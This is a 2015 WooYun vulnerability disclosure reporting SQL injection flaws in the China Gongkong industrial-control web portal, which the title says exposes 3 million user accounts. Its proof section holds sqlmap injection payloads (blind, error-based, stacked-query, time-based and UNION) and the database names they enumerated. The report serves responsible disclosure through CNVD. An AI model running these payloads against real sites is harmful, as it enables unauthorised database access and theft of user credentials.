当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149364

漏洞标题:中国工控网多处漏洞导致300万用户账号密码泄露可登陆(旺财谷经融)

相关厂商:中国工控网

漏洞作者: 路人甲

提交时间:2015-10-27 13:02

修复时间:2015-12-14 17:38

公开时间:2015-12-14 17:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

中国工控网多处漏洞导致300万用户账号密码泄露可登陆(旺财谷经融)

详细说明:

http://**.**.**.**/SheYingPhotoContent.aspx?photoid=2012013016324000001


http://**.**.**.**/Ashx/Base/GetCompany.ashx?city=


http://**.**.**.**/customer/hite_20110815/energy_details.asp?id=2011090517235600003


http://**.**.**.**/customer/rockwell/com-detail.asp?id=2936


http://**.**.**.**/customer/photo/zpzs_hy_list.Asp?industryid=2012071311541500002


http://**.**.**.**/customer/photo/hjzp_user_detail.asp?Id=10926


漏洞证明:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: photoid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: photoid=2012013016324000001' AND 9243=9243 AND 'aoVa'='aoVa
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: photoid=2012013016324000001' AND 2346=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(98)+
CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2346=2346) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(
122)+CHAR(113)+CHAR(106)+CHAR(113))) AND 'Irzr'='Irzr
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: photoid=2012013016324000001';WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: photoid=2012013016324000001' WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: photoid=-1674' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+
CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(103)+CHAR(87)+CHAR(77)+CHAR(69)+CHAR(85)+CHAR(1
14)+CHAR(99)+CHAR(81)+CHAR(76)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL--
---
[16:00:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[16:00:43] [INFO] fetching database names
[16:00:44] [WARNING] the SQL query provided does not return any output
[16:00:44] [WARNING] the SQL query provided does not return any output
[16:00:44] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '
--no-cast' or switch '--hex'
[16:00:44] [INFO] fetching number of databases
[16:00:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' fo
r faster data retrieval
[16:00:44] [INFO] retrieved:
[16:00:45] [WARNING] time-based comparison requires larger statistical model, please wait...........
..............
[16:01:20] [CRITICAL] considerable lagging has been detected in connection response(s). Please use a
s high value for option '--time-sec' as possible (e.g. 10 or more)
[16:01:22] [WARNING] it is very important not to stress the network adapter during usage of time-bas
ed payloads to prevent potential errors
[16:01:25] [ERROR] unable to retrieve the number of databases
available databases [19]:
[*] aspnetdb
[*] blog
[*] edc
[*] exam
[*] GkNetAid
[*] GkRegUser
[*] gkstudy
[*] gksystem
[*] gongkong_1
[*] gongkonghelp
[*] gongkongNet
[*] gongkongnetpro
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xuegongkong


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: id=2936;IF(1985=1985) SELECT 1985 ELSE DROP FUNCTION FJHb--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=2936;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=2936 WAITFOR DELAY '0:0:5'
---
[16:07:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[16:07:37] [INFO] fetching database names
[16:07:37] [INFO] fetching number of databases
[16:07:37] [INFO] resumed: 52
[16:07:37] [INFO] resumed: ABB
[16:07:37] [INFO] resumed: agongkong
[16:07:37] [INFO] resumed: ase_050124
[16:07:37] [INFO] resumed: caa
[16:07:37] [INFO] resumed: cfpmia
[16:07:37] [INFO] resumed: cus_2010_for_bb
[16:07:37] [INFO] resumed: cus_abb
[16:07:37] [INFO] resumed: cus_abb_BC
[16:07:37] [INFO] resumed: custom
[16:07:37] [INFO] resumed: custom_1
[16:07:37] [INFO] resumed: forzdao
[16:07:37] [INFO] resumed: GkCrm
[16:07:37] [INFO] resumed: gkmall
[16:07:37] [INFO] resumed: gknetdatanew
[16:07:37] [INFO] resumed: gkoa
[16:07:37] [INFO] resumed: gkreguser
[16:07:37] [INFO] resumed: gkstat
[16:07:37] [INFO] resumed: GkStudy
[16:07:37] [INFO] resumed: gkstudynet
[16:07:37] [INFO] resumed: gksystem
[16:07:37] [INFO] resumed: gongkong
[16:07:37] [INFO] resumed: gongkongcorp
[16:07:37] [INFO] resumed: GongKongNet
[16:07:37] [INFO] resumed: inquire
[16:07:37] [INFO] resumed: kpi2012
[16:07:37] [INFO] resumed: lndata_tmp
[16:07:37] [INFO] resumed: LouKong
[16:07:37] [INFO] resumed: master
[16:07:37] [INFO] resumed: model
[16:07:37] [INFO] resumed: msdb
[16:07:37] [INFO] resumed: NBBS
[16:07:37] [INFO] resumed: NDic
[16:07:37] [INFO] resumed: NMessage
[16:07:37] [INFO] resumed: NRegUser
[16:07:37] [INFO] resumed: NRegUserDynamic
[16:07:37] [INFO] resumed: NSys
[16:07:37] [INFO] resumed: NSysLog
[16:07:37] [INFO] resumed: nweblog
[16:07:37] [INFO] resumed: opc_2009
[16:07:37] [INFO] resumed: peCms
[16:07:37] [INFO] resumed: Photography
[16:07:37] [INFO] resumed: ReportServer
[16:07:37] [INFO] resumed: ReportServerTempDB
[16:07:37] [INFO] resumed: schneider_data
[16:07:37] [INFO] resumed: SchneiderBBS
[16:07:37] [INFO] resumed: siemensQuiz
[16:07:37] [INFO] resumed: tempdb
[16:07:37] [INFO] resumed: wap2011
[16:07:37] [INFO] resumed: wapsubscribe
[16:07:37] [INFO] resumed: xiugongkong
[16:07:37] [INFO] resumed: xuegongkong
[16:07:37] [INFO] resumed: youjiang
available databases [52]:
[*] ABB
[*] agongkong
[*] ase_050124
[*] caa
[*] cfpmia
[*] cus_2010_for_bb
[*] cus_abb
[*] cus_abb_BC
[*] custom
[*] custom_1
[*] forzdao
[*] GkCrm
[*] gkmall
[*] gknetdatanew
[*] gkoa
[*] gkreguser
[*] gkstat
[*] GkStudy
[*] gkstudynet
[*] gksystem
[*] gongkong
[*] gongkongcorp
[*] GongKongNet
[*] inquire
[*] kpi2012
[*] lndata_tmp
[*] LouKong
[*] master
[*] model
[*] msdb
[*] NBBS
[*] NDic
[*] NMessage
[*] NRegUser
[*] NRegUserDynamic
[*] NSys
[*] NSysLog
[*] nweblog
[*] opc_2009
[*] peCms
[*] Photography
[*] ReportServer
[*] ReportServerTempDB
[*] schneider_data
[*] SchneiderBBS
[*] siemensQuiz
[*] tempdb
[*] wap2011
[*] wapsubscribe
[*] xiugongkong
[*] xuegongkong
[*] youjiang


1.1.png


1.2.png


1.3.png


1.4.png


1.5.png


1.11.PNG


1.12.PNG


14.png


15.png


16.png


17.png


修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-30 17:37

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无

漏洞评价:

评价